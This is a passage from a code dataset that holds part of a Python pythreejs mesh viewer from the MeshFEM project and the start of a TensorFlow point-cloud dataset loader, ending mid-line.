s = max(w, h)\n if (powerOfTwo): s = int(np.exp2(np.ceil(np.log2(s))))\n padded = np.pad(tex, [(s - h, 0), (0, s - w), (0, 0)], 'constant', constant_values=128) # pad top, right\n\n self.dataTex = pythreejs.DataTexture(data=padded, format='RGBAFormat', type='UnsignedByteType')\n self.dataTex.wrapS = 'ClampToEdgeWrapping'\n self.dataTex.magFilter = 'LinearFilter'\n self.dataTex.minFilter = 'LinearMipMapLinearFilter'\n self.dataTex.generateMipmaps = True\n self.dataTex.flipY = True\n\n self.uv *= np.array([float(w) / s, float(h) / s])\n\n# According to the documentation (and experience...) the use of textures and vertex colors\n# \"can't be easily changed at runtime (once the material is rendered at least once)\",\n# apparently because these options change the shader program that is generated for the material\n# (which happens only once, upon first render).\n# Therefore, we will need different materials for all the combinations of\n# settings used in our viewer. We do that here, on demand.\nclass MaterialLibrary:\n def __init__(self, isLineMesh, isPointCloud):\n self.materials = {}\n self.isLineMesh = isLineMesh\n self.isPointCloud = isPointCloud\n if (not isLineMesh and not isPointCloud):\n self.commonArgs = {'side': 'DoubleSide', 'polygonOffset': True, 'polygonOffsetFactor': 1, 'polygonOffsetUnits': 1}\n else:\n self.commonArgs = {}\n\n def material(self, useVertexColors, textureMapDataTex = None):\n name = self._mangledMaterialName(False, useVertexColors, textureMapDataTex)\n if name not in self.materials:\n if (self.isLineMesh):\n args = self._colorTexArgs(useVertexColors, textureMapDataTex, '#000000')\n self.materials[name] = pythreejs.LineBasicMaterial(**args, **self.commonArgs)\n elif (self.isPointCloud):\n args = self._colorTexArgs(useVertexColors, textureMapDataTex, '#000000')\n self.materials[name] = pythreejs.PointsMaterial(**args, **self.commonArgs, size=5, sizeAttenuation=False)\n else:\n args = self._colorTexArgs(useVertexColors, textureMapDataTex, '#D3D3D3') # \"light gray\"\n self.materials[name] = pythreejs.MeshLambertMaterial(**args, **self.commonArgs)\n return self.materials[name]\n\n def ghostMaterial(self, origMaterial, solidColor):\n name = self._mangledNameForMaterial(True, origMaterial)\n if name not in self.materials:\n args = {'transparent': True, 'opacity': 0.25}\n args.update(self._colorTexArgs(*self._extractMaterialDescriptors(origMaterial), solidColor))\n if (self.isLineMesh ): self.materials[name] = pythreejs. LineBasicMaterial(**args, **self.commonArgs)\n elif (self.isPointCloud): self.materials[name] = pythreejs. PointsMaterial(**args, **self.commonArgs, size=5, sizeAttenuation=False)\n else: self.materials[name] = pythreejs.MeshLambertMaterial(**args, **self.commonArgs)\n else:\n # Update the existing ghost material's color (if a solid color is used)\n useVertexColors, textureMapDataTex = self._extractMaterialDescriptors(origMaterial)\n if (useVertexColors == False) and (textureMapDataTex is None):\n self.materials[name].color = solidColor\n\n return self.materials[name]\n\n def freeMaterial(self, material):\n '''Release the specified material from the library, destroying its comm'''\n name = self._mangledNameForMaterial(False, material)\n if (name not in self.materials): raise Exception('Material to be freed is not found (is it a ghost?)')\n mat = self.materials.pop(name)\n mat.close()\n\n def _colorTexArgs(self, useVertexColors, textureMapDataTex, solidColor):\n args = {}\n if useVertexColors:\n args['vertexColors'] = 'VertexColors'\n if textureMapDataTex is not None:\n args['map'] = textureMapDataTex\n if (useVertexColors == False) and (textureMapDataTex is None):\n args['color'] = solidColor\n return args\n\n def _mangledMaterialName(self, isGhost, useVertexColors, textureMapDataTex):\n # Since texture map data is stored in the material, we need a separate\n # material for each distinct texture map.\n category = 'ghost' if isGhost else 'solid'\n return f'{category}_vc{useVertexColors}' if textureMapDataTex is None else f'solid_vc{useVertexColors}_tex{textureMapDataTex.model_id}'\n\n def _extractMaterialDescriptors(self, material):\n '''Get the (useVertexColors, textureMapDataTex) descriptors for a non-ghost material'''\n return (material.vertexColors == 'VertexColors',\n material.map if hasattr(material, 'map') else None)\n\n def _mangledNameForMaterial(self, isGhost, material):\n useVertexColors, textureMapDataTex = self._extractMaterialDescriptors(material)\n return self._mangledMaterialName(isGhost, useVertexColors, textureMapDataTex)\n\n def __del__(self):\n for k, mat in self.materials.items():\n mat.close()\n\n# I couldn't get an async/await solution to work (awaiting\n# an ipywidgdet event captured with an observe callback\n# based on https://github.com/jupyter-widgets/ipywidgets/blob/master/docs/source/examples/Widget%20Asynchronous.ipynb\n# just hangs), and\n# explicitly calling the kernel's event loop is unreliable messes up the cell\n# output/execution order. The following implementation based on jupyter_ui_poll\n# seems to work well.\nclass ScreenshotWriter():\n def __init__(self, widget):\n import ipywebrtc\n stream = ipywebrtc.WidgetStream(widget=widget)\n self.rec = ipywebrtc.ImageRecorder(format='png', stream=stream)\n self._i = 0\n\n def capture(self, path):\n from jupyter_ui_poll import ui_events\n import time\n self.rec.recording = False # shouldn't be necessary: attempt to unstick\n self.rec.image.value = b''\n self.rec.recording = True\n with ui_events() as poll:\n for i in range(20): # Wait for at most 2s for this screenshot before giving up.\n if self.rec.image.value: break\n poll(10)\n time.sleep(0.1)\n if self.rec.image.value:\n self.rec.save(path)\n self._i += 1\n\ndef htmlColor(color):\n if (isinstance(color, str)): return color\n return '#' + ''.join([f'{round(255 * c):02x}' for c in color])\n\n# superView allows this viewer to add geometry to an existing viewer.\nclass PythreejsViewerBase(ViewerBase):\n def __init__(self, obj, width=512, height=512, textureMap=None, scalarField=None, vectorField=None, superView=None, transparent=False):\n # Note: subclass's constructor should define\n # self.MeshConstructor and self.isLineMesh, which will\n # determine how the geometry is interpreted.\n if (not hasattr(self, \"isLineMesh\" )): self.isLineMesh = False\n if (not hasattr(self, \"isPointCloud\")): self.isPointCloud = False\n if (self.MeshConstructor is None):\n self.MeshConstructor = pythreejs.Mesh\n\n self.avoidRedrawFlicker = False\n\n self.objects = pythreejs.Group()\n self.meshes = pythreejs.Group()\n self.ghostMeshes = pythreejs.Group() # Translucent meshes kept around by preserveExisting\n self.ghostColor = '#FF0000'\n\n self.materialLibrary = MaterialLibrary(self.isLineMesh, self.isPointCloud)\n\n # Sometimes we do not use a particular attribute buffer, e.g. the index buffer when displaying\n # per-face scalar fields. But to avoid reallocating these buffers when\n # switching away from these cases, we need to preserve the buffers\n # that may have previously been allocated. This is done with the bufferAttributeStash.\n # A buffer attribute, if it exists, must always be attached to the\n # current BufferGeometry or in this stash (but not both!).\n self.bufferAttributeStash = {}\n\n self.currMesh = None # The main pythreejs mesh being viewed\n self.wireframeMesh = None # Wireframe for the main visualization mesh\n self.pointsMesh = None # Points for the main visualization mesh\n self.vectorFieldMesh = None\n\n self.cachedWireframeMaterial = None\n self.cachedPointsMaterial = None\n\n self.shouldShowWireframe = False\n self.scalarField = None\n self.vectorField = None\n\n self.superView = superView\n if (superView is None):\n self.objects.add([self.meshes, self.ghostMeshes])\n else:\n superView.objects.add([self.meshes, self.ghostMeshes])\n superView.subViews.append(self)\n self.subViews = []\n\n self._arrowMaterial = None # Will hold this viewer's instance of the special vector field shader (shared/overridden by superView)\n self._arrowSize = 60\n\n if (superView is None):\n # We must create the camera now (instead of later in `setCamera`) so\n # that we can attach orbit controls and create the scene\n self.cam = pythreejs.PerspectiveCamera(position=[0, 0, 5], up=[0, 1, 0], aspect=width / height)\n\n # Camera needs to be part of the scene because the scene light is its child\n # (so that it follows the camera).\n self.scene = pythreejs.Scene(children=[self.objects, self.cam, pythreejs.AmbientLight(intensity=0.5)])\n\n # Sane trackball controls.\n self.controls = pythreejs.TrackballControls(controlling=self.cam)\n self.controls.staticMoving = True\n self.controls.rotateSpeed = 2.0\n self.controls.zoomSpeed = 2.0\n self.controls.panSpeed = 1.0\n self.renderer = pythreejs.Renderer(camera=self.cam, scene=self.scene, controls=[self.controls], width=width, height=height)\n else:\n self.cam = superView.cam\n self.scene = superView.scene\n self.controls = superView.controls\n self.renderer = superView.renderer\n\n super().__init__(obj, width=width, height=height, textureMap=textureMap, scalarField=scalarField, vectorField=vectorField, transparent=transparent, isSubview=superView is not None)\n\n def setCamera(self, position, up, fovy, aspect, near, far):\n self.cam.position = position\n self.cam.up = up\n self.cam.fovy = fovy\n self.cam.aspect = aspect\n self.cam.near = near\n self.cam.far = far\n\n def setPointLight(self, color, position):\n self.light = pythreejs.PointLight(color=htmlColor(color), position=position)\n self.cam.children = [self.light]\n\n def makeTransparent(self, color=None):\n if color is not None:\n self.ghostColor = color\n self.currMesh.material = self.materialLibrary.ghostMaterial(self.currMesh.material, self.ghostColor)\n\n def makeOpaque(self, color=None):\n self.currMesh.material = self.materialLibrary.material(False)\n if (color is not None):\n self.currMesh.material.color = color\n\n def _setGeometryImpl(self, vertices, idxs, attrRaw, preserveExisting=False, updateModelMatrix=False, textureMap=None, scalarField=None, vectorField=None, transparent=False):\n \"\"\"\n Backend-specific parts of ViewerBase.setGeometry\n \"\"\"\n # Turn the current mesh into a ghost if preserveExisting\n if (preserveExisting and (self.currMesh is not None)):\n oldMesh = self.currMesh\n self.currMesh = None\n oldMesh.material = self.materialLibrary.ghostMaterial(oldMesh.material, self.ghostColor)\n self.meshes.remove(oldMesh)\n self.ghostMeshes.add(oldMesh)\n\n # Also convert the current vector field into a ghost (if one is displayed)\n if (self.vectorFieldMesh in self.meshes.children):\n oldVFMesh = self.vectorFieldMesh\n self.vectorFieldMesh = None\n oldVFMesh.material.transparent = True\n colors = oldVFMesh.geometry.attributes['arrowColor'].array\n colors[:, 3] = 0.25\n oldVFMesh.geometry.attributes['arrowColor'].array = colors\n self.meshes.remove(oldVFMesh)\n self.ghostMeshes.add(oldVFMesh)\n else:\n self.__cleanMeshes(self.ghostMeshes)\n\n useVertexColors = self.scalarField is not None\n material = self.materialLibrary.material(useVertexColors, None if textureMap is None else textureMap.dataTex)\n\n if transparent:\n material = self.materialLibrary.ghostMaterial(material, self.ghostColor)\n\n ########################################################################\n # Build or update mesh from the raw attributes.\n ########################################################################\n stashableKeys = ['index', 'color', 'uv']\n def allocateUpdateOrStashBufferAttribute(attr, key):\n # Verify invariant that attributes, if they exist, must either be\n # attached to the current geometry or in the stash (but not both)\n assert((key not in attr) or (key not in self.bufferAttributeStash))\n\n if key in attrRaw:\n if key in self.bufferAttributeStash:\n # Reuse the stashed index buffer\n attr[key] = self.bufferAttributeStash[key]\n self.bufferAttributeStash.pop(key)\n\n # Update existing attribute or allocate it for the first time\n val = attrRaw[key]\n if key == 'color': val = val[:, 0:3] # pythreejs only supports RGB color arrays, not RGBA\n if key in attr:\n attr[key].array = val\n else:\n attr[key] = pythreejs.BufferAttribute(val)\n else:\n if key in attr:\n # Stash the existing, unneeded attribute\n self.bufferAttributeStash[key] = attr[key]\n attr.pop(key)\n\n # Avoid flicker/partial redraws during updates (if the user has our pythreejs fork installed)\n if self.avoidRedrawFlicker and hasattr(self.renderer, 'pauseRendering'):\n self.renderer.pauseRendering()\n\n if (self.currMesh is None):\n attr = {}\n\n presentKeys = list(attrRaw.keys())\n for key in presentKeys:\n if key in stashableKeys:\n allocateUpdateOrStashBufferAttribute(attr, key)\n attrRaw.pop(key)\n attr.update({k: pythreejs.BufferAttribute(v) for k, v in attrRaw.items()})\n\n geom = pythreejs.BufferGeometry(attributes=attr)\n m = self.MeshConstructor(geometry=geom, material=material)\n self.currMesh = m\n self.meshes.add(m)\n else:\n # Update the current mesh...\n attr = self.currMesh.geometry.attributes.copy()\n attr['position'].array = attrRaw['position']\n if 'normal' in attr:\n attr['normal'].array = attrRaw['normal']\n\n for key in stashableKeys:\n allocateUpdateOrStashBufferAttribute(attr, key)\n\n self.currMesh.geometry.attributes = attr\n self.currMesh.material = material\n\n # If we reallocated the current mesh (preserveExisting), we need to point\n # the wireframe/points mesh at the new geometry.\n if self.wireframeMesh is not None:\n self.wireframeMesh.geometry = self.currMesh.geometry\n if self.pointsMesh is not None:\n self.pointsMesh.geometry = self.currMesh.geometry\n\n ########################################################################\n # Build/update the vector field mesh if requested (otherwise hide it).\n ########################################################################\n if (self.vectorField is not None):\n # Construct vector field from raw data array if necessary\n if (not isinstance(self.vectorField, VectorField)):\n self.vectorField = VectorField(self.mesh, self.vectorField)\n\n self.vectorField.validateSize(vertices.shape[0], idxs.shape[0])\n self.vectorFieldMesh = self.vectorField.getArrows(vertices, idxs, material=self.arrowMaterial, existingMesh=self.vectorFieldMesh)\n\n self.arrowMaterial = self.vectorFieldMesh.material\n self.arrowMaterial.updateUniforms(**self._arrowMaterialUniforms())\n self.controls.shaderMaterial = self.arrowMaterial\n if (self.vectorFieldMesh not in self.meshes.children):\n self.meshes.add(self.vectorFieldMesh)\n else:\n if (self.vectorFieldMesh in self.meshes.children):\n self.meshes.remove(self.vectorFieldMesh)\n\n if self.avoidRedrawFlicker:\n # The scene is now complete; reenable rendering and redraw immediatley.\n # This is allowed to fail in case the user doesn't have my pythreejs fork...\n try: self.renderer.resumeRendering()\n except: pass\n\n def _arrowMaterialUniforms(self):\n # When updating any uniforms of the arrow mterial we need to prevent\n # stale, unsynced `rendererWidth` and `targetDepth` from overwriting\n # the correct values in the frontend; recalculate fresh values here.\n return { 'arrowSizePx_x' : self.arrowSize,\n 'rendererWidth' : self.renderer.width,\n 'targetDepth' : np.linalg.norm(np.array(self.cam.position) - np.array(self.controls.target)),\n 'arrowAlignment': self.vectorField.align.getRelativeOffset()}\n\n @property\n def arrowSize(self):\n return self._arrowSize\n\n @arrowSize.setter\n def arrowSize(self, value):\n self._arrowSize = value\n if (self.arrowMaterial is not None):\n self.arrowMaterial.updateUniforms(**self._arrowMaterialUniforms())\n @property\n def arrowMaterial(self):\n if (self.superView is None): return self._arrowMaterial\n else: return self.superView.arrowMaterial\n\n @arrowMaterial.setter\n def arrowMaterial(self, arrowMat):\n if (self.superView is None): self._arrowMaterial = arrowMat\n else: self.superView.arrowMaterial = arrowMat\n\n def showWireframe(self, shouldShow = True):\n if shouldShow:\n if self.wireframeMesh is None:\n # The wireframe shares geometry with the current mesh, and should automatically be updated when the current mesh is...\n self.wireframeMesh = pythreejs.Mesh(geometry=self.currMesh.geometry, material=self.wireframeMaterial())\n if self.wireframeMesh not in self.meshes.children:\n self.meshes.add(self.wireframeMesh)\n else: # hide\n if self.wireframeMesh in self.meshes.children:\n self.meshes.remove(self.wireframeMesh)\n self.shouldShowWireframe = shouldShow\n\n def showPoints(self, shouldShow=True, size=5):\n if shouldShow:\n if self.pointsMesh is None:\n # The points \"mesh\" shares geometry with the current mesh, and should automatically be updated when the current mesh is...\n self.pointsMesh = pythreejs.Points(geometry=self.currMesh.geometry, material=self.pointsMaterial())\n if self.pointsMesh not in self.meshes.children:\n self.meshes.add(self.pointsMesh)\n else: # hide\n if self.pointsMesh in self.meshes.children:\n self.meshes.remove(self.pointsMesh)\n if (self.cachedPointsMaterial is not None):\n self.cachedPointsMaterial.size = size\n\n def wireframeMaterial(self):\n if (self.cachedWireframeMaterial is None):\n self.cachedWireframeMaterial = self.allocateWireframeMaterial()\n return self.cachedWireframeMaterial\n\n def pointsMaterial(self):\n if (self.cachedPointsMaterial is None):\n self.cachedPointsMaterial = self.allocatePointsMaterial()\n return self.cachedPointsMaterial\n\n # Allocate a wireframe material for the mesh; this can be overrided by, e.g., mode_viewer\n # to apply different settings.\n def allocateWireframeMaterial(self):\n return pythreejs.MeshBasicMaterial(color='black', side='DoubleSide', wireframe=True)\n\n # Allocate a wireframe material for the mesh; this can be overrided by, e.g., mode_viewer\n # to apply different settings.\n def allocatePointsMaterial(self):\n return pythreejs.PointsMaterial(color='black', size=5, sizeAttenuation=False)\n\n def getCameraParams(self):\n return (self.cam.position, self.cam.up, self.controls.target)\n\n def setCameraParams(self, params):\n self.cam.position, self.cam.up, self.controls.target = params\n self.cam.lookAt(self.controls.target)\n\n def show(self):\n return self.renderer\n\n def resize(self, width, height):\n self.renderer.width = width\n self.renderer.height = height\n\n def getSize(self):\n return (self.renderer.width, self.renderer.height)\n\n def exportHTML(self, path):\n import ipywidget_embedder\n ipywidget_embedder.embed(path, self.renderer)\n\n def writeScreenshot(self, path):\n if not hasattr(self, 'screenshotWriter'):\n self.screenshotWriter = ScreenshotWriter(self.renderer)\n self.screenshotWriter.capture(path)\n\n def offscreenRenderer(self, width = None, height = None, scale = None):\n import OffscreenRenderer\n if scale is not None:\n if width is not None or height is not None:\n raise Exception('Specifying `scale` and `width` or `height` are mutually exclusive')\n width = self.renderer.width * scale\n height = self.renderer.height * scale\n if width is None: width = self.renderer.width\n if height is None: height = self.renderer.height\n mr = OffscreenRenderer.MeshRenderer(width, height)\n self.__addOffscreenRendererObjects(mr)\n\n mr.setCameraParams(self.getCameraParams())\n for m in mr.meshes: m.modelMatrix(self.objects.position, self.objects.scale, self.objects.quaternion)\n mr.perspective(50, width / height, 0.1, 2000)\n\n mr.specularIntensity[:] = 0.0 # Our viewer currently doesn't have any specular highlights\n return mr\n\n def antialiasedImage(self, renderScale=2, outputScale=1):\n orender = self.offscreenRenderer(scale=renderScale)\n for m in orender.meshes:\n m.lineWidth *= renderScale\n orender.render()\n return orender.scaledImage(outputScale / renderScale)\n\n def __addOffscreenRendererObjects(self, mr):\n \"\"\"\n Recursively add the meshes of `self` *and its subviews* to the\n offscreen mesh renderer `mr`.\n \"\"\"\n if (not self.isPointCloud):\n mainMesh = self.meshes.children[0]\n attr = mainMesh.geometry.attributes\n P = attr['position'].array\n N = attr['normal'].array\n C = attr['color'].array if 'color' in attr else mainMesh.material.color\n F = attr['index'].array if 'index' in attr else None\n mr.addMesh(P, F, N, C, makeDefault=False)\n\n mr.meshes[-1].alpha = mainMesh.material.opacity\n mr.meshes[-1].lineWidth = 0.75 if ((self.wireframeMesh is not None) and (self.wireframeMesh in self.meshes.children)) else 0.0\n\n if self.vectorFieldMesh is not None:\n vga = self.vectorFieldMesh.geometry.attributes\n amu = self._arrowMaterialUniforms()\n mr.addVectorFieldMesh(vga['position'].array, vga[ 'index'].array, vga[ 'normal'].array,\n vga['arrowPos'].array, vga['arrowVec'].array, vga['arrowColor'].array,\n amu['arrowSizePx_x'] / amu['rendererWidth'], amu['arrowAlignment'], amu['targetDepth'])\n\n for gm in self.ghostMeshes.children:\n attr = gm.geometry.attributes\n P = attr['position'].array\n N = attr['normal'].array\n C = attr['color'].array if 'color' in attr else self.materialLibrary.ghostMaterial(self.materialLibrary.material(False), self.ghostColor).color\n F = attr['index'].array if 'index' in attr else None\n mr.addMesh(P, F, N, C, makeDefault=False)\n mr.meshes[-1].alpha = 0.25\n mr.meshes[-1].lineWidth = 1.0 if ((self.wireframeMesh is not None) and (self.wireframeMesh in self.meshes.children)) else 0.0\n\n # Recursively add subviews\n for sv in self.subViews:\n sv.__addOffscreenRendererObjects(mr)\n\n def transformModel(self, position, scale, quaternion):\n self.objects.scale = [scale] * 3\n self.objects.position = tuple(position)\n self.objects.quaternion = quaternion\n\n def setDarkMode(self, dark=True):\n if (dark):\n self.renderer.scene.background = '#111111'\n self.materialLibrary.material(False).color = '#F49111' # 'orange'\n self.wireframeMaterial().color = 'black' # '#220022'\n else:\n self.renderer.scene.background = '#FFFFFF'\n self.materialLibrary.material(False).color = '#D3D3D3' # 'light gray'\n self.wireframeMaterial().color = 'black'\n\n def highlightTriangles(self, tris):\n \"\"\"\n Add a subview highlighting a triangle or list of triangles.\n \"\"\"\n if isinstance(tris, int):\n tris = np.array([tris], dtype=np.int)\n submesh = mesh_operations.removeDanglingVertices(self.mesh.vertices(), self.mesh.triangles()[tris])\n subview = TriMeshViewer(submesh, superView=self)\n subview.showPoints()\n self.subViews.append(subview)\n\n def clearSubviews(self):\n for s in self.subViews:\n if s.superView != self: raise Exception('subview-superview relationship disagreement')\n self.objects.remove([s.meshes, s.ghostMeshes])\n s.superView = -1 # subview has been divorced from its superview\n self.subViews = []\n\n def removeSubview(self, subview):\n if subview not in self.subViews: return # raise Exception('subview does not exist')\n self.objects.remove([subview.meshes, subview.ghostMeshes])\n self.subViews.remove(subview)\n\n def __cleanMeshes(self, meshGroup):\n meshes = list(meshGroup.children)\n for oldMesh in meshes:\n meshGroup.remove(oldMesh)\n\n # Note: the wireframe mesh shares geometry with the current mesh;\n # avoid a double close.\n if ((oldMesh != self.wireframeMesh) and (oldMesh != self.pointsMesh)):\n oldMesh.geometry.exec_three_obj_method('dispose')\n for k, attr in oldMesh.geometry.attributes.items():\n attr.close()\n oldMesh.geometry.close()\n\n oldMesh.close()\n\n def __del__(self):\n # Clean up resources\n self.__cleanMeshes(self.ghostMeshes)\n\n if ((self.superView is not None) and (self.superView != -1)):\n self.superView.removeSubview(self)\n\n # If vectorFieldMesh, wireframeMesh, or pointsMesh exist but are hidden, add them to the meshes group for cleanup\n for m in [self.vectorFieldMesh, self.wireframeMesh, self.pointsMesh]:\n if (m is not None) and (m not in self.meshes.children):\n self.meshes.add(m)\n self.__cleanMeshes(self.meshes)\n\n if (self.cachedWireframeMaterial is not None): self.cachedWireframeMaterial.close()\n if (self.cachedPointsMaterial is not None): self.cachedPointsMaterial.close()\n\n # Also clean up our stashed buffer attributes (these are guaranteed not\n # to be attached to the geometry that was already cleaned up).\n for k, v in self.bufferAttributeStash.items():\n v.close()\n\n if self.superView is None:\n # We need to explicitly close the widgets we generated or they will\n # remain open in the frontend and backend, leaking memory (due to the\n # global widget registry).\n # https://github.com/jupyter-widgets/ipywidgets/issues/1345\n import ipywidget_embedder\n ds = ipywidget_embedder.dependency_state(self.renderer)\n keys = list(ds.keys())\n for k in keys:\n ipywidgets.Widget.widgets[k].close()\n\n self.renderer.close()\n", "repo_name": "MeshFEM/MeshFEM", "sub_path": "python/vis/pythreejs_viewer.py", "file_name": "pythreejs_viewer.py", "file_ext": "py", "file_size_in_byte": 29558, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 46, "dataset": "github-code", "pt": "61", "api": [{"api_name": "pythreejs.DataTexture", "line_number": 28, "usage_type": "call"}, {"api_name": "pythreejs.LineBasicMaterial", "line_number": 58, "usage_type": "call"}, {"api_name": "pythreejs.PointsMaterial", "line_number": 61, "usage_type": "call"}, {"api_name": "pythreejs.MeshLambertMaterial", "line_number": 64, "usage_type": "call"}, {"api_name": "pythreejs.LineBasicMaterial", "line_number": 72, "usage_type": "call"}, {"api_name": "pythreejs.PointsMaterial", "line_number": 73, "usage_type": "call"}, {"api_name": "pythreejs.MeshLambertMaterial", "line_number": 74, "usage_type": "call"}, {"api_name": "ipywebrtc.WidgetStream", "line_number": 129, "usage_type": "call"}, {"api_name": "ipywebrtc.ImageRecorder", "line_number": 130, "usage_type": "call"}, {"api_name": "jupyter_ui_poll.ui_events", "line_number": 139, "usage_type": "call"}, {"api_name": "time.sleep", "line_number": 143, "usage_type": "call"}, {"api_name": "pythreejs.Mesh", "line_number": 161, "usage_type": "attribute"}, {"api_name": "pythreejs.Group", "line_number": 165, "usage_type": "call"}, {"api_name": "pythreejs.Group", "line_number": 166, "usage_type": "call"}, {"api_name": "pythreejs.Group", "line_number": 167, "usage_type": "call"}, {"api_name": "pythreejs.PerspectiveCamera", "line_number": 206, "usage_type": "call"}, {"api_name": "pythreejs.Scene", "line_number": 210, "usage_type": "call"}, {"api_name": "pythreejs.AmbientLight", "line_number": 210, "usage_type": "call"}, {"api_name": "pythreejs.TrackballControls", "line_number": 213, "usage_type": "call"}, {"api_name": "pythreejs.Renderer", "line_number": 218, "usage_type": "call"}, {"api_name": "pythreejs.PointLight", "line_number": 236, "usage_type": "call"}, {"api_name": "pythreejs.BufferAttribute", "line_number": 301, "usage_type": "call"}, {"api_name": "pythreejs.BufferAttribute", "line_number": 320, "usage_type": "call"}, {"api_name": "pythreejs.BufferGeometry", "line_number": 322, "usage_type": "call"}, {"api_name": "pythreejs.Mesh", "line_number": 404, "usage_type": "call"}, {"api_name": "pythreejs.Points", "line_number": 416, "usage_type": "call"}, {"api_name": "pythreejs.MeshBasicMaterial", "line_number": 438, "usage_type": "call"}, {"api_name": "pythreejs.PointsMaterial", "line_number": 443, "usage_type": "call"}, {"api_name": "ipywidget_embedder.embed", "line_number": 464, "usage_type": "call"}, {"api_name": "{'ipywebrtc': 'ipywebrtc', 'ui_events': 'jupyter_ui_poll.ui_events', 'time': 'time'}", "line_number": 468, "usage_type": "call"}, {"api_name": "OffscreenRenderer.MeshRenderer", "line_number": 480, "usage_type": "call"}, {"api_name": "ipywidget_embedder.dependency_state", "line_number": 615, "usage_type": "call"}, {"api_name": "ipywidgets.Widget", "line_number": 618, "usage_type": "attribute"}]} +{"seq_id": "71965191874", "text": "import os\nimport sys\nimport numpy as np\nimport tensorflow as tf\n\nBASE_DIR = os.path.dirname(os.path.abspath(__file__))\nROOT_DIR = os.path.dirname(BASE_DIR)\nsys.path.insert(0, ROOT_DIR)\n\nOPS_DIR = os.path.join(ROOT_DIR, 'ops')\nsys.path.insert(0, OPS_DIR)\n\nfrom ops import get_tf_func\n\nclass Dataset(object):\n def __init__(self, config):\n self.config = config\n\n # path\n self.data_path = config.data_path if config.data_path else 'Data'\n self.data_path = f'{self.data_path}/{config.dataset}'\n # interface - init op\n self.train_init_op = None\n self.val_init_op = None\n self.test_init_op = None\n\n @property\n def info(self):\n return {\n 'ignored_labels': self.ignored_labels,\n 'label_names': self.label_names,\n }\n\n def valid_split(self, split, short=False):\n assert split in ['train', 'training', 'val', 'validation', 'test'], f'invalid split = {split}'\n if split.startswith('train'):\n return 'train' if short else 'training'\n elif split.startswith('val'):\n return 'val' if short else 'validation'\n else:\n return 'test'\n\n def init_labels(self):\n \"\"\"\n Initiate all label parameters given the label_to_names dict\n \"\"\"\n self.num_classes = len(self.label_to_names) - len(self.ignored_labels)\n assert self.config.num_classes == self.num_classes\n\n self.label_values = np.sort([k for k, v in self.label_to_names.items()]) # may not be consecutive or start from 0\n self.label_names = [self.label_to_names[k] for k in self.label_values]\n self.name_to_label = {v: k for k, v in self.label_to_names.items()}\n\n # original label value <-> idx of valid label\n self.label_to_idx = []\n idx = 0\n for l in self.label_values:\n while len(self.label_to_idx) < l:\n self.label_to_idx += [None] # skipped labels - not even invalid i.e. should not exists in label idx\n self.label_to_idx += [idx] if l not in self.ignored_labels else [-1]\n idx += l not in self.ignored_labels\n self.label_to_idx = np.array(self.label_to_idx)\n self.idx_to_label = np.array([l for l in self.label_values if l not in self.ignored_labels])\n\n def initialize(self, verbose=True):\n config = self.config\n # initialize op\n if config.search == 'radius':\n self.initialize_radius(verbose=verbose)\n elif config.search == 'knn':\n self.initialize_fixed_size(verbose=verbose)\n else:\n raise NotImplementedError(f'not supported methods: sampling = {config.sample}; searching = {config.search}')\n\n def initialize_radius(self, verbose=True):\n config = self.config\n self.batch_limit = self.calibrate_batches('training', config.batch_size) # max num points [BxN] of a batch - used in get_batch_gen\n self.batch_limit_val = self.calibrate_batches('validation', config.batch_size_val) if config.batch_size_val else None\n # neighbor_limits - used in base.big_neighborhood_filter => set neighbor_idx shape\n self.neighborhood_limits = config.neighborhood_limits if config.neighborhood_limits else self.calibrate_neighbors('training')\n if config.max_neighborhood_limits:\n self.neighborhood_limits = [min(i, config.max_neighborhood_limits) for i in self.neighborhood_limits]\n self.neighborhood_limits = [int(l * config.density_parameter // 5) for l in self.neighborhood_limits]\n if verbose:\n print(\"batch_limit: \", self.batch_limit)\n print(\"neighborhood_limits: \", self.neighborhood_limits)\n\n # Get generator and mapping function\n gen_function, gen_types, gen_shapes = self.get_batch_gen_radius('training')\n gen_function_val, _, _ = self.get_batch_gen_radius('validation')\n gen_function_test, _, _ = self.get_batch_gen_radius('test')\n kwargs = gen_function.kwargs if hasattr(gen_function, 'kwargs') else {}\n map_func = self.get_tf_mapping_radius(**kwargs)\n\n self.train_data = tf.data.Dataset.from_generator(gen_function, gen_types, gen_shapes)\n self.train_data = self.train_data.map(map_func=map_func, num_parallel_calls=self.num_threads)\n # self.train_data = self.train_data.apply(tf.data.experimental.copy_to_device('/gpu:0'))\n self.train_data = self.train_data.prefetch(tf.data.experimental.AUTOTUNE)\n # self.train_data = self.train_data.apply(tf.data.experimental.prefetch_to_device('/gpu:0'))\n\n self.val_data = tf.data.Dataset.from_generator(gen_function_val, gen_types, gen_shapes)\n self.val_data = self.val_data.map(map_func=map_func, num_parallel_calls=self.num_threads)\n self.val_data = self.val_data.prefetch(tf.data.experimental.AUTOTUNE)\n\n self.test_data = None\n if gen_function_test is not None:\n self.test_data = tf.data.Dataset.from_generator(gen_function_test, gen_types, gen_shapes)\n self.test_data = self.test_data.map(map_func=map_func, num_parallel_calls=self.num_threads)\n self.test_data = self.test_data.prefetch(tf.data.experimental.AUTOTUNE)\n\n # create a iterator of the correct shape and type\n iter = tf.data.Iterator.from_structure(self.train_data.output_types, self.train_data.output_shapes)\n # independent stream for each gpus\n self.flat_inputs = [iter.get_next() for i in range(config.gpu_num)]\n # create the initialisation operations\n self.train_init_op = iter.make_initializer(self.train_data)\n self.val_init_op = iter.make_initializer(self.val_data)\n self.test_init_op = iter.make_initializer(self.test_data) if self.test_data is not None else None\n\n def initialize_fixed_size(self, verbose=True):\n config = self.config\n if verbose:\n print('\\n\\t'.join(['k-nn & ratio:'] + [f'{a} = {getattr(config, a)}' for a in ['kr_search', 'kr_sample', 'kr_sample_up', 'r_sample']]))\n\n # Get generator and mapping function\n gen_function, gen_types, gen_shapes = self.get_batch_gen_fixed_size('training')\n gen_function_val, _, _ = self.get_batch_gen_fixed_size('validation')\n gen_function_test, _, _ = self.get_batch_gen_fixed_size('test')\n map_func = self.get_tf_mapping_fixed_size()\n\n self.train_data = tf.data.Dataset.from_generator(gen_function, gen_types, gen_shapes)\n self.train_data = self.train_data.batch(config.batch_size)\n self.train_data = self.train_data.map(map_func=map_func, num_parallel_calls=self.num_threads)\n self.train_data = self.train_data.prefetch(tf.data.experimental.AUTOTUNE)\n\n self.val_data = tf.data.Dataset.from_generator(gen_function_val, gen_types, gen_shapes)\n self.val_data = self.val_data.batch(config.batch_size_val if config.batch_size_val else config.batch_size)\n self.val_data = self.val_data.map(map_func=map_func, num_parallel_calls=self.num_threads)\n self.val_data 